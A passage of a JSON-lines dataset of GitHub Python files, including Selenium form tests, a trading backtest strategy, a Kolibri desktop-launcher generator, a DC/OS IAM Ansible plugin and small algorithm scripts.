alfcp.add())\n\talfcp.add().click()\n\ttime.sleep(4)\n\tlogger.info(u'点击添加按钮')\n\tdriver.switch_to.default_content()\n\tdriver.switch_to.frame(alfcp.frameOfAddLateFeeCollection())\n\thighLightElement(driver, alfcp.merchant())\n\talfcp.merchant().click()\n\tlogger.info(u'点击商户名称文本框')\n\thighLightElement(driver, alfcp.merchantInput())\n\talfcp.merchantInput().send_keys(merchantName)\n\tlogger.info(u'输入商户名称:%s' % merchantName)\n\thighLightElement(driver, alfcp.merchantSearch())\n\talfcp.merchantSearch().click()\n\tlogger.info(u'点击商户名称搜索按钮')\n\thighLightElement(driver, alfcp.merchantSearchResult())\n\talfcp.merchantSearchResult().click()\n\tlogger.info(u'选择商户名称搜索结果')\n\thighLightElement(driver, alfcp.contract())\n\talfcp.contract().click()\n\tlogger.info(u'点击合同号文本框')\n\thighLightElement(driver, alfcp.contractInput())\n\talfcp.contractInput().send_keys(contractName)\n\tlogger.info(u'输入合同号:%s' % contractName)\n\thighLightElement(driver, alfcp.contractSearch())\n\talfcp.contractSearch().click()\n\tlogger.info(u'点击合同号搜索按钮')\n\ttime.sleep(2)\n\thighLightElement(driver, alfcp.contractSearchResult())\n\talfcp.contractSearchResult().click()\n\tlogger.info(u'选择合同号搜索结果')\n\thighLightElement(driver, alfcp.lateFeeNum())\n\talfcp.lateFeeNum().click()\n\tlogger.info(u'点击滞纳金单号文本框')\n\thighLightElement(driver, alfcp.lateFeeNumInput())\n\talfcp.lateFeeNumInput().send_keys(lateFeeNum)\n\tlogger.info(u'输入滞纳金单号:%s' % lateFeeNum)\n\thighLightElement(driver, alfcp.lateFeeSearch())\n\talfcp.lateFeeSearch().click()\n\tlogger.info(u'点击滞纳金单号搜索按钮')\n\thighLightElement(driver, alfcp.lateFeeSearchResult())\n\talfcp.lateFeeSearchResult().click()\n\tlogger.info(u'选择滞纳金单号搜索结果')\n\thighLightElement(driver, alfcp.paymentTime())\n\talfcp.paymentTime().clear()\n\talfcp.paymentTime().send_keys(paymentTime)\n\tlogger.info(u'输入收款日期:%s' % paymentTime)\n\thighLightElement(driver, alfcp.feeType())\n\talfcp.feeType().click()\n\tlogger.info(u'点击费用状态文本框')\n\thighLightElement(driver, alfcp.feeTypeSelect1())\n\talfcp.feeTypeSelect1().click()\n\tlogger.info(u'选择费用状态')\n\thighLightElement(driver, alfcp.addRow())\n\talfcp.addRow().click()\n\tlogger.info(u'点击增加行按钮')\n\thighLightElement(driver, alfcp.collectionTypeBox())\n\talfcp.collectionTypeBox().click()\n\tlogger.info(u'点击收款方式文本框')\n\talfcp.collectionTypeBoxInner().click()\n\talfcp.collectionType().click()\n\tlogger.info(u'选择收款方式')\n\thighLightElement(driver, alfcp.collectionMoneyBox())\n\talfcp.collectionMoneyBox().click()\n\tlogger.info(u'点击收款金额文本框')\n\talfcp.collectionMoney().clear()\n\talfcp.collectionMoney().send_keys(collectionMoney)\n\tlogger.info(u'输入收款金额:%s' % collectionMoney)\n\thighLightElement(driver, alfcp.deductMoneyBox())\n\talfcp.deductMoneyBox().click()\n\tlogger.info(u'点击本次抵扣金额文本框')\n\talfcp.deductMoney().clear()\n\talfcp.deductMoney().send_keys(deductMoney)\n\tlogger.info(u'输入抵扣金额:%s' % deductMoney)\n\thighLightElement(driver, alfcp.save())\n\talfcp.save().click()\n\tlogger.info(u'点击保存按钮')\n\thighLightElement(driver, alfcp.confirm())\n\talfcp.confirm().click()\n\tlogger.info(u'确认收款信息')\n\tlogger.info(u'提示信息:%s' % (alfcp.information()))\n\ndef addLateFeeCollectionList(driver, contractName=''):\n\talfcp = AddLateFeeCollectionPage(driver)\n\tdriver.switch_to.default_content()\n\tdriver.switch_to.frame(alfcp.frameOfLateFeeCollection())\n\ttime.sleep(3)\n\thighLightElement(driver, alfcp.contractOfList())\n\talfcp.contractOfList().click()\n\thighLightElement(driver, alfcp.contractInputOfList())\n\talfcp.contractInputOfList().send_keys(contractName)\n\thighLightElement(driver, 
alfcp.contractSearchOfList())\n\talfcp.contractSearchOfList().click()\n\thighLightElement(driver, alfcp.contractSearchResultOfList())\n\talfcp.contractSearchResultOfList().click()\n\thighLightElement(driver, alfcp.search())\n\talfcp.search().click()\n\ttime.sleep(2)\n\tgtd = GetTableData(driver)\n\tfileName = listData + 'addLateFeeCollectionList.log'\n\ttable = PrettyTable(['购物中心', '状态', '经营商户', '经营店铺', '合同号', '滞纳金单号', '收款金额', '抵扣金额', '未收款金额', '收款时间'])\n\ttable.align['购物中心'] = '1'\n\ttable.padding_width = 1\n\ttable.add_row([gtd.row14(), gtd.row16(), gtd.row17(), gtd.row18(), gtd.row19(), gtd.row110(), gtd.row111(), gtd.row112(), gtd.row113(), gtd.row114()])\n\tlogger.info(u'正在获取列表数据')\n\ttime.sleep(2)\n\tprint(table)\n\twith open(fileName, 'w') as file:\n\t\tfile.write(str(table))\n\tlogger.info(u'保存位置:%s' % fileName)\n","repo_name":"thinker365/MIS-3.0.0","sub_path":"Action/addLateFeeCollection.py","file_name":"addLateFeeCollection.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16702321454","text":"import logging\n\nimport pandas as pd\n\nfrom backtest.strategy import Strategy\nfrom utils import utils\nfrom utils.utils import date2str\n\nlogger = logging.getLogger(__name__)\n\n\nclass MAStrategy(Strategy):\n\n def __init__(self, broker, params):\n super().__init__(broker, None)\n self.params = params\n self.df_position = pd.DataFrame()\n\n def set_data(self, df_dict: dict, df_baseline=None):\n super().set_data(df_baseline, df_dict)\n self.df = df_dict[self.params.code]\n self.code = self.params.code\n\n def next(self, today, trade_date):\n super().next(today, trade_date)\n s_today = self.get_value(self.df, today)\n s_yesterday = utils.get_series(self.df, today, -1)\n\n # 不是交易日数据,忽略\n if s_today is None: return\n\n position = self.broker.get_position(self.code)\n if not position and s_today.close > s_today.ma:\n if not self.broker.get_position(self.code):\n self.broker.buy(self.code, trade_date, amount=self.broker.total_cash)\n logger.debug(\"[%s] [%s] close[%.4f] > ma[%.4f], 买入\",\n date2str(today), self.code, s_today.close, s_today.ma)\n return\n\n if position and s_today.close < s_today.ma:\n if self.broker.get_position(self.code):\n logger.debug(\"[%s] [%s] close[%.4f] < ma[%.4f], 卖出\",\n date2str(today), self.code, s_today.close, s_today.ma)\n self.broker.sell_out(self.code, trade_date)\n return\n\n # 如果持仓,看是否到止损,到止损,就需要卖出清仓了\n # 按理说应该是盘中止损,但是,我的框架模拟不出来,只好第二天再止损\n # 看今天的收盘价已经超过损失了\n # import pdb;pdb.set_trace()\n if position and s_today.max_drawdown < self.params.max_drawdown:\n pnl = (s_today.close - position.cost) / position.cost\n logger.warning(\"[%s] [%s]今日最大回撤[%.4f] 大于了 规定的最大回撤[%.4f],止盈/损清仓[%.2f%%]\",\n date2str(today), self.code, s_today.max_drawdown, self.params.max_drawdown, pnl * 100)\n self.broker.sell_out(self.code, trade_date)","repo_name":"piginzoo/quant_research","sub_path":"cta/ma/my/ma_strategy.py","file_name":"ma_strategy.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"25568026225","text":"from modeller import *\nfrom modeller.automodel import *\n\nclass MyModel(automodel):\n def special_patches(self, aln):\n self.rename_segments(segment_ids=['A'],\n renumber_residues=[944])\n\n\ne = environ()\n\na = MyModel(e, alnfile='3KFO-fill.ali',\n knowns='3KFO', sequence='3KFO-fill')\na.starting_model = 1\na.ending_model = 
5\na.make()\n","repo_name":"saltzberg/imp_website","sub_path":"1.0/tutorial/saxs/fill.py","file_name":"fill.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"25991719905","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport base64\nimport configparser\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\n\nfrom kolibri.core.content.models import ChannelMetadata\nfrom kolibri.dist.django.utils.functional import cached_property\nfrom kolibri.dist.django.utils.six import BytesIO\nfrom PIL import Image\nfrom PIL import ImageDraw\n\nfrom .path_utils import ensure_dir\nfrom .path_utils import get_content_share_dir_path\nfrom .path_utils import get_kolibri_gnome_path\nfrom .path_utils import try_remove\nfrom .pillow_utils import center_xy\nfrom .pillow_utils import crop_image_to_square\nfrom .pillow_utils import image_is_square\nfrom .pillow_utils import paste_center\nfrom .pillow_utils import resize_preserving_aspect_ratio\n\nlogger = logging.getLogger(__name__)\n\nDATA_URI_PATTERN = re.compile(\n \"^(data:)(?P[\\\\w\\\\/\\\\+-]*)(;base64),(?P.*)\"\n)\n\nLAUNCHER_CATEGORIES = (\"Education\", \"X-Kolibri-Channel\")\n\nKOLIBRI_APP_ID = os.environ.get(\"FLATPAK_ID\", \"org.learningequality.Kolibri\")\nKOLIBRI_SEARCH_PROVIDER_BUS_NAME = KOLIBRI_APP_ID + \".SearchProvider\"\nKOLIBRI_SEARCH_PROVIDER_OBJECT_PATH = \"/\" + KOLIBRI_SEARCH_PROVIDER_BUS_NAME.replace(\n \".\", \"/\"\n)\n\nCHANNEL_DESKTOP_ID_FORMAT = KOLIBRI_APP_ID + \".channel_{}\"\nCHANNEL_SEARCH_PROVIDER_OBJECT_PATH_FORMAT = (\n KOLIBRI_SEARCH_PROVIDER_OBJECT_PATH + \"/channel_{}\"\n)\n\n\ndef update_channel_launchers(force=False):\n context = ChannelLaunchersContext()\n\n launchers_from_db = list(ChannelLauncher_FromDatabase.load_all(context))\n launchers_from_disk = list(ChannelLauncher_FromDisk.load_all(context))\n\n did_icons_change = False\n\n for launcher in launchers_from_disk:\n if not any(map(launcher.is_same_channel, launchers_from_db)):\n logger.info(\"Removing desktop launcher %s\", launcher)\n launcher.delete()\n did_icons_change = True\n\n for launcher in launchers_from_db:\n if not any(map(launcher.is_same_channel, launchers_from_disk)):\n logger.info(\"Creating desktop launcher %s\", launcher)\n launcher.save()\n did_icons_change = True\n elif force or any(map(launcher.compare, launchers_from_disk)):\n logger.info(\"Updating desktop launcher %s\", launcher)\n launcher.save()\n did_icons_change = True\n\n if did_icons_change:\n update_icon_cache_params = [context.icon_theme_dir]\n\n try:\n system_theme_index = \"/usr/share/icons/hicolor/index.theme\"\n theme_index = os.path.join(context.icon_theme_dir, \"index.theme\")\n shutil.copyfile(system_theme_index, theme_index)\n except OSError:\n update_icon_cache_params += [\"--ignore-theme-index\"]\n\n try:\n subprocess.run([\"gtk-update-icon-cache\", *update_icon_cache_params])\n except OSError as error:\n logger.info(\"Error running gtk-update-icon-cache: %s\", error)\n\n\nclass ChannelLaunchersContext(object):\n @property\n def applications_dir(self):\n return os.path.join(get_content_share_dir_path(), \"applications\")\n\n @property\n def search_providers_dir(self):\n return os.path.join(\n get_content_share_dir_path(), \"gnome-shell\", \"search-providers\"\n )\n\n @property\n def icon_theme_dir(self):\n return os.path.join(get_content_share_dir_path(), \"icons\", 
\"hicolor\")\n\n\nclass ChannelLauncher(object):\n def __init__(self, context):\n self.__context = context\n\n def __str__(self):\n return self.desktop_file_name\n\n @property\n def channel_id(self):\n raise NotImplementedError()\n\n @property\n def desktop_id(self):\n return CHANNEL_DESKTOP_ID_FORMAT.format(self.channel_id)\n\n @property\n def channel_version(self):\n raise NotImplementedError()\n\n @property\n def desktop_file_path(self):\n return os.path.join(self.__context.applications_dir, self.desktop_file_name)\n\n @property\n def desktop_file_name(self):\n return \"{}.desktop\".format(self.desktop_id)\n\n @property\n def search_provider_file_path(self):\n return os.path.join(\n self.__context.search_providers_dir, self.search_provider_file_name\n )\n\n @property\n def search_provider_file_name(self):\n return \"{}.ini\".format(self.desktop_id)\n\n def get_icon_file_path(self, file_name, size=\"256x256\"):\n return os.path.join(self.__context.icon_theme_dir, size, \"apps\", file_name)\n\n def compare(self, other):\n if not self.is_same_channel(other):\n return None\n self_channel, self_format = map(int, self.channel_version.split(\"~\"))\n other_channel, other_format = map(int, other.channel_version.split(\"~\"))\n return (self_channel - other_channel) or (self_format - other_format)\n\n def is_same_channel(self, other):\n return (\n self.desktop_file_path == other.desktop_file_path\n and self.channel_id == other.channel_id\n )\n\n def save(self):\n try:\n icon_name = self.write_channel_icon()\n except Exception as error:\n logger.warning(\n \"Error writing icon file for channel %s: %s\", self.channel_id, error\n )\n icon_name = None\n\n try:\n self.write_desktop_file(icon_name)\n except Exception as error:\n logger.warning(\n \"Error writing desktop file for channel %s: %s\", self.channel_id, error\n )\n\n try:\n self.write_search_provider()\n except Exception as error:\n logger.warning(\n \"Error writing search provider for channel %s: %s\",\n self.channel_id,\n error,\n )\n\n def delete(self):\n self.delete_desktop_file()\n self.delete_search_provider()\n self.delete_channel_icon()\n\n def write_desktop_file(self, icon_name):\n raise NotImplementedError()\n\n def delete_desktop_file(self):\n os.remove(self.desktop_file_path)\n\n def write_search_provider(self):\n raise NotImplementedError()\n\n def delete_search_provider(self):\n try_remove(self.search_provider_file_path)\n\n def write_channel_icon(self):\n raise NotImplementedError()\n\n def delete_channel_icon(self):\n raise NotImplementedError()\n\n\nclass ChannelLauncher_FromDatabase(ChannelLauncher):\n FORMAT_VERSION = 7\n\n def __init__(self, context, channelmetadata):\n super().__init__(context)\n self.__channelmetadata = channelmetadata\n\n @classmethod\n def load_all(cls, context):\n for channelmetadata in ChannelMetadata.objects.filter(root__available=True):\n yield cls(context, channelmetadata)\n\n @property\n def channel_id(self):\n return self.__channelmetadata.id\n\n @property\n def channel_version(self):\n return \"{}~{}\".format(self.__channelmetadata.version, self.FORMAT_VERSION)\n\n @cached_property\n def __channel_icon(self):\n try:\n return ChannelIcon(self.__channelmetadata.thumbnail)\n except ValueError:\n return None\n\n def write_desktop_file(self, icon_name):\n desktop_file_parser = configparser.ConfigParser()\n desktop_file_parser.optionxform = str\n desktop_file_parser.add_section(\"Desktop Entry\")\n desktop_file_parser.set(\"Desktop Entry\", \"Version\", \"1.0\")\n desktop_file_parser.set(\"Desktop 
Entry\", \"Type\", \"Application\")\n desktop_file_parser.set(\"Desktop Entry\", \"Name\", self.__channelmetadata.name)\n desktop_file_parser.set(\n \"Desktop Entry\", \"Comment\", self.__channelmetadata.tagline or \"\"\n )\n desktop_file_parser.set(\n \"Desktop Entry\",\n \"Exec\",\n \"gio open x-kolibri-dispatch://{channel_id}\".format(\n channel_id=self.channel_id\n ),\n )\n desktop_file_parser.set(\"Desktop Entry\", \"X-Endless-LaunchMaximized\", \"True\")\n desktop_file_parser.set(\n \"Desktop Entry\", \"X-Kolibri-Channel-Id\", self.channel_id\n )\n desktop_file_parser.set(\n \"Desktop Entry\", \"X-Kolibri-Channel-Version\", self.channel_version\n )\n desktop_file_parser.set(\n \"Desktop Entry\", \"Categories\", \";\".join(LAUNCHER_CATEGORIES) + \";\"\n )\n\n if icon_name:\n desktop_file_parser.set(\"Desktop Entry\", \"Icon\", icon_name)\n\n kolibri_gnome = get_kolibri_gnome_path()\n if kolibri_gnome:\n desktop_file_parser.set(\"Desktop Entry\", \"TryExec\", kolibri_gnome)\n\n ensure_dir(self.desktop_file_path)\n with open(self.desktop_file_path, \"w\") as desktop_entry_file:\n desktop_file_parser.write(desktop_entry_file, space_around_delimiters=False)\n\n def write_search_provider(self):\n search_provider_file_parser = configparser.ConfigParser()\n search_provider_file_parser.optionxform = str\n search_provider_file_parser.add_section(\"Shell Search Provider\")\n search_provider_file_parser.set(\n \"Shell Search Provider\", \"DesktopId\", self.desktop_file_name\n )\n search_provider_file_parser.set(\n \"Shell Search Provider\", \"BusName\", KOLIBRI_SEARCH_PROVIDER_BUS_NAME\n )\n search_provider_file_parser.set(\n \"Shell Search Provider\",\n \"ObjectPath\",\n CHANNEL_SEARCH_PROVIDER_OBJECT_PATH_FORMAT.format(self.channel_id),\n )\n search_provider_file_parser.set(\"Shell Search Provider\", \"Version\", \"2\")\n\n ensure_dir(self.search_provider_file_path)\n with open(self.search_provider_file_path, \"w\") as search_provider_file:\n search_provider_file_parser.write(\n search_provider_file, space_around_delimiters=False\n )\n\n def write_channel_icon(self):\n if not self.__channel_icon:\n return\n\n icon_name = self.desktop_id\n icon_file_path = self.get_icon_file_path(\n icon_name + self.__channel_icon.file_extension\n )\n\n ensure_dir(icon_file_path)\n with open(icon_file_path, \"wb\") as icon_file:\n self.__channel_icon.write(icon_file)\n\n return icon_name\n\n\nclass ChannelLauncher_FromDisk(ChannelLauncher):\n def __init__(self, context, desktop_file_path, desktop_entry_data):\n super().__init__(context)\n self.__desktop_file_path = desktop_file_path\n self.__desktop_entry_data = desktop_entry_data\n\n @classmethod\n def load_all(cls, context):\n applications_dir = os.path.join(get_content_share_dir_path(), \"applications\")\n if not os.path.isdir(applications_dir):\n return\n for file_name in os.listdir(applications_dir):\n file_path = os.path.join(applications_dir, file_name)\n desktop_file_parser = configparser.ConfigParser()\n desktop_file_parser.optionxform = str\n desktop_file_parser.read(file_path)\n if desktop_file_parser.has_section(\"Desktop Entry\"):\n desktop_entry_data = dict(\n desktop_file_parser.items(section=\"Desktop Entry\")\n )\n yield cls(context, file_path, desktop_entry_data)\n\n @property\n def channel_id(self):\n return self.__desktop_entry_data.get(\"X-Kolibri-Channel-Id\")\n\n @property\n def channel_version(self):\n return self.__desktop_entry_data.get(\"X-Kolibri-Channel-Version\")\n\n @property\n def desktop_file_path(self):\n return 
self.__desktop_file_path\n\n @property\n def desktop_file_name(self):\n return os.path.basename(self.desktop_file_path)\n\n def write_channel_icon(self):\n pass\n\n def delete_channel_icon(self):\n icon_name = self.__desktop_entry_data.get(\"Icon\")\n\n if not icon_name:\n return\n\n # We assume the channel's icon file is a png\n icon_file_path = self.get_icon_file_path(icon_name + \".png\")\n\n if icon_file_path and os.path.isfile(icon_file_path):\n try_remove(icon_file_path)\n\n\nclass ChannelIcon(object):\n MIMETYPES_MAP = {\"image/jpg\": \"image/jpeg\"}\n\n icon_size = (256, 256)\n icon_inner_size = (256 - 48, 256 - 48)\n\n def __init__(self, thumbnail_data_uri):\n match = DATA_URI_PATTERN.match(thumbnail_data_uri)\n if not match:\n raise ValueError(\"Invalid data URI\")\n self.__thumbnail_info = match.groupdict()\n\n @property\n def mimetype(self):\n result = self.__thumbnail_info.get(\"mimetype\")\n return self.MIMETYPES_MAP.get(result, result)\n\n @cached_property\n def thumbnail_data(self):\n return base64.b64decode(self.__thumbnail_info.get(\"data_b64\"))\n\n @cached_property\n def file_extension(self):\n return \".png\"\n\n @cached_property\n def thumbnail_image(self):\n thumbnail_io = BytesIO(self.thumbnail_data)\n return Image.open(thumbnail_io)\n\n @cached_property\n def icon_image(self):\n return self.__apply_icon_mask(self.__icon_inner_default_image)\n\n def write(self, icon_file):\n self.icon_image.save(icon_file)\n\n @cached_property\n def __icon_source_image(self):\n # The icon source image is the thumbnail, cropped to remove its own\n # padding, and cropped again to square if the icon is close to square\n # already.\n\n bbox = self.thumbnail_image.getbbox()\n image_cropped = self.thumbnail_image.crop(bbox)\n return crop_image_to_square(image_cropped, cut_area=0.04)\n\n @cached_property\n def __icon_inner_fill_image(self):\n # The \"fill\" icon variant resizes the source image to icon_inner_size.\n # The corners will be rounded, later, by __apply_icon_mask.\n\n base_image = Image.new(\"RGBA\", self.icon_inner_size, (0, 0, 0, 0))\n thumbnail_image = resize_preserving_aspect_ratio(\n self.__icon_source_image, self.icon_inner_size, resample=Image.BICUBIC\n )\n paste_center(base_image, thumbnail_image)\n return base_image\n\n @cached_property\n def __icon_inner_tile_image(self):\n # The \"tile\" icon variant resizes the source image to a smaller space\n # inside icon_inner_size. The remaining space is filled with a white\n # background.\n\n thumbnail_size = (256 - 80, 256 - 80)\n\n base_image = Image.new(\"RGBA\", self.icon_inner_size, (255, 255, 255, 255))\n thumbnail_image = resize_preserving_aspect_ratio(\n self.__icon_source_image, thumbnail_size, resample=Image.BICUBIC\n )\n paste_center(base_image, thumbnail_image)\n return base_image\n\n @cached_property\n def __icon_inner_default_image(self):\n # The default icon variant is the \"fill\" variant if it is exactly\n # square with no transparent pixels. 
Otherwise, it is the \"tile\"\n # variant.\n\n if image_is_square(self.__icon_inner_fill_image):\n return self.__icon_inner_fill_image\n else:\n return self.__icon_inner_tile_image\n\n def __apply_icon_mask(self, icon_image):\n # The icon mask is a rounded rectangle matching the GNOME icon set.\n\n shadow_size = (256 - 50, 256 - 50)\n plate_size = (256 - 52, 256 - 52)\n\n base_mask = Image.new(\"L\", self.icon_size, (0,))\n base_mask_draw = ImageDraw.Draw(base_mask)\n base_mask_draw.rounded_rectangle(\n center_xy(base_mask.size, shadow_size),\n 14,\n fill=(200,),\n width=1,\n )\n base_mask_draw.rounded_rectangle(\n center_xy(base_mask.size, plate_size),\n 14,\n fill=(255,),\n outline=(255,),\n width=1,\n )\n\n base_image = Image.new(\"RGBA\", self.icon_size, (0, 0, 0, 0))\n paste_center(base_image, icon_image)\n base_image.putalpha(base_mask)\n\n return base_image\n","repo_name":"endlessm/kolibri-app-desktop-xdg-plugin","sub_path":"kolibri_app_desktop_xdg_plugin/channel_launchers.py","file_name":"channel_launchers.py","file_ext":"py","file_size_in_byte":15945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21264787349","text":"import numpy as np\nimport math\n\nclass Observer:\n \"\"\"\n A simple observer that assumes targets move in straight lines at a constant speed.\n\n Take in full observation, return estimated full states and estimated velocities.\n\n Attributes: \n observation_history : emmmmm... \n vel : velocities\n window : history length, i.e. history for how long before now we would like to keep\n step : discretization time step\n r_roi : Radius of region of interest\n \"\"\"\n window = 5\n observation_history = [0]*window\n step = 0.1\n vel = 0\n states = 0\n r_roi = 1\n\n\n def __init__(self, x0, stp, windw, r=1):\n self.window = windw\n self.observation_history = [x0]*windw\n self.step = stp\n self.states = x0\n self.r_roi = r\n\n\n \n def feed(self, new_obsrv):\n # print('1',self.observation_history)\n obsrv = new_obsrv.copy()\n # print(obsrv)\n self.observation_history.pop(0) # Discard the oldest observation in the slot\n self.observation_history.append(obsrv)\n\n # Successive difference method calculating velocities\n num_grp = math.floor(self.window/2)\n sum = self.observation_history[self.window-1] - self.observation_history[self.window-1]\n for i in range(1, num_grp+1):\n sum = sum + self.observation_history[self.window-i] - self.observation_history[self.window-num_grp-i]\n self.states = new_obsrv\n self.vel = sum / num_grp / (self.step*num_grp)\n\n\n\n## Test\nif __name__ == '__main__':\n v = 1\n T = 0.01\n x = np.array([[0, 0], [1, 1], [2,2]])\n observer = Observer(x, T, 5)\n for k in range(1, 10):\n x = x + v*T\n observer.feed(x)\n print(k)\n print(observer.observation_history)\n print(observer.vel)\n","repo_name":"EdmundLuan/CLF_CBF_NMPC_python","sub_path":"observer.py","file_name":"observer.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"4373747560","text":"import csv\nimport random\n\nf = open('numbers.txt','w')\n\na = []\nfor i in range(100):\n a.append(+random.randint(100,10000))\na.sort()\nprint(a)\n\n\nfor i in a:\n line = ''\n for j in range(i):\n line += str(random.randint(-100000, 100000)) + \" \"\n 
f.write(line+'\n')\n\n","repo_name":"Cofeeee/AISD_GrahamScan_","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42996832121","text":"#!/usr/bin/python3\n# Definition for a point.\nclass Point(object):\n    def __init__(self, a=0, b=0):\n        self.x = a\n        self.y = b\nfrom collections import defaultdict\nclass Solution(object):\n    def maxPoints(self, points):\n        n = len(points)\n        if n < 3:\n            return n\n        Max = 0\n        for i in range(n - Max):\n            samep = 1\n            j = i + 1\n            while j < n:\n                if points[i].x == points[j].x and points[i].y == points[j].y:\n                    samep += 1\n                    j += 1  # advance j past the duplicate point, otherwise this loop never terminates\n                    continue\n                lMax = 1\n                k = j + 1\n                while k < n:\n                    a = (points[i].x - points[k].x)*(points[j].y - points[k].y)\n                    b = (points[i].y - points[k].y)*(points[j].x - points[k].x)\n                    if a == b:\n                        lMax += 1\n                    k += 1\n                Max = max(Max, lMax + samep)\n                j += 1\n            Max = max(Max, samep)\n        return Max\n\n\npoints = []\npoints.append(Point(0,0))\npoints.append(Point(-1,-1))\npoints.append(Point(2, 2))\nsol = Solution()\nresult = sol.maxPoints(points)\nprint(result)\nresult = sol.maxPoints([])\nprint(result)","repo_name":"zhuango/leetCode","sub_path":"PythonForLeetCode/maxPoints.py","file_name":"maxPoints.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"39253172574","text":"import numpy as np\nimport pandas as pd\nimport nltk\n#from multiprocessing import Pool\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nimport re\nfrom itertools import chain\nfrom collections import Counter\nimport pickle\nimport scipy.io as scio\nfrom sklearn.decomposition import TruncatedSVD\nimport scipy.spatial.distance as distance\nimport scipy.cluster.hierarchy as hierarchy\nfrom scipy.stats import pearsonr\n\n\ndef cluster(id, corr, reqRank):\n\n    # Initial\n    dat = pd.read_csv(\"../NoineEngine/Questions_Rank.csv\", encoding='latin1')\n    dat['Rank'].fillna(0, inplace=True)\n    ids = range(len(dat))\n    sample = dat.loc[ids, :]\n    L = np.loadtxt('../NoineEngine/Linkage.txt')\n\n    # Next Question\n    if corr:\n        rel_wt = 0.75\n    else:\n        rel_wt = 0.95\n\n    cls = hierarchy.fcluster(L, rel_wt, criterion='inconsistent')\n    df_cls = pd.DataFrame({'Pos': ids, 'Cluster': cls})\n    bc = pd.concat([sample, df_cls.set_index('Pos')], axis=1)\n\n    cnts = df_cls.groupby('Cluster').size().sort_values(ascending=False)\n    for i in range(len(cnts)):\n        print(bc.loc[bc['Cluster'] == cnts.index[i]][['ID', 'Questions', 'Rank', 'Cluster']])\n\n    clusterId = 0\n\n    for i in range(len(bc['Cluster'])):\n        row_id = bc.iloc[i, 0]\n        row_rank = bc.iloc[i, 2]\n        row_clusId = bc.iloc[i, 9]\n\n        if row_id == id:\n            clusterId = row_clusId\n            break\n\n    for i in range(len(bc['Cluster'])):\n        row_id = bc.iloc[i, 0]\n        row_rank = bc.iloc[i, 2]\n        row_clusId = bc.iloc[i, 9]\n\n        if corr:\n            if clusterId == row_clusId and row_rank == reqRank and row_id != id:\n                return row_id\n        else:\n            if clusterId != row_clusId and row_rank == reqRank and row_id != id:\n                return row_id\n\n    for i in range(len(bc['Cluster'])):\n        row_id = bc.iloc[i, 0]\n        row_rank = bc.iloc[i, 2]\n\n        if row_rank == reqRank:\n            return 
row_id\n","repo_name":"abhishekanand1710/Noine-Bytes","sub_path":"NoineFlow/Correlator.py","file_name":"Correlator.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70543110545","text":"\"\"\"\nAction plugin to manipulate permission resources on a DC/OS enterprise cluster.\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nfrom ansible.errors import AnsibleActionFail\nfrom ansible.plugins.action import ActionBase\n\ntry:\n import dcos.security.iam as iam\n from dcos.errors import DCOSException\nexcept ImportError:\n raise AnsibleActionFail(\"Missing package: try 'pip install dcos-python'\")\n\ntry:\n from __main__ import display\nexcept ImportError:\n from ansible.utils.display import Display\n display = Display()\n\n\nclass ActionModule(ActionBase):\n def run(self, tmp=None, task_vars=None):\n\n result = super(ActionModule, self).run(tmp, task_vars)\n result['changed'] = False\n\n args = self._task.args\n rid = args.get('rid')\n description = args.get('description', 'created by Ansible')\n wanted_state = args.get('state', 'present')\n\n if rid is None:\n raise AnsibleActionFail(\n 'rid cannot be empty for dcos_iam_resource')\n\n group = iam.get_group(rid)\n current_state = 'present' if group is not None else 'absent'\n\n if self._play_context.check_mode:\n if current_state != wanted_state:\n result['changed'] = True\n result['msg'] = 'would change resource {} to be {}'.format(\n rid, wanted_state)\n return result\n\n if current_state == wanted_state:\n display.vvv(\"User {} already {}\".format(rid, wanted_state))\n else:\n display.vvv(\"User {} not {}\".format(rid, wanted_state))\n if not self._play_context.check_mode:\n try:\n if wanted_state == 'present':\n iam.create_resource(rid, description)\n result['msg'] = 'Resource {} was created'.format(rid)\n elif wanted_state == 'absent':\n iam.delete_resource(rid)\n result['msg'] = 'Resource {} was deleted'.format(rid)\n except DCOSException as e:\n raise AnsibleActionFail(e)\n\n result['changed'] = True\n\n return result\n","repo_name":"dirkjonker/ansible-dcos","sub_path":"action_plugins/dcos_iam_resource.py","file_name":"dcos_iam_resource.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"17086706317","text":"import os\nimport shutil\nfrom jinja2 import FileSystemLoader, environment\nfrom nomadic.util import md2html\n\n\ndir = os.path.dirname(os.path.abspath(__file__))\nenv = environment.Environment()\nenv.loader = FileSystemLoader(os.path.join(dir, '../server/assets/templates/export'))\n\n\ndef compile_note(note, outdir, templ):\n templ = env.get_template('{}.html'.format(templ))\n\n # create output directory if necessary\n outdir = os.path.join(outdir, note.title)\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n # copy over any images\n for img in note.images:\n img_path = os.path.join(outdir, img)\n img_dir = os.path.dirname(img_path)\n\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n shutil.copy(os.path.join(note.notebook.path.abs, img), img_path)\n\n # render the 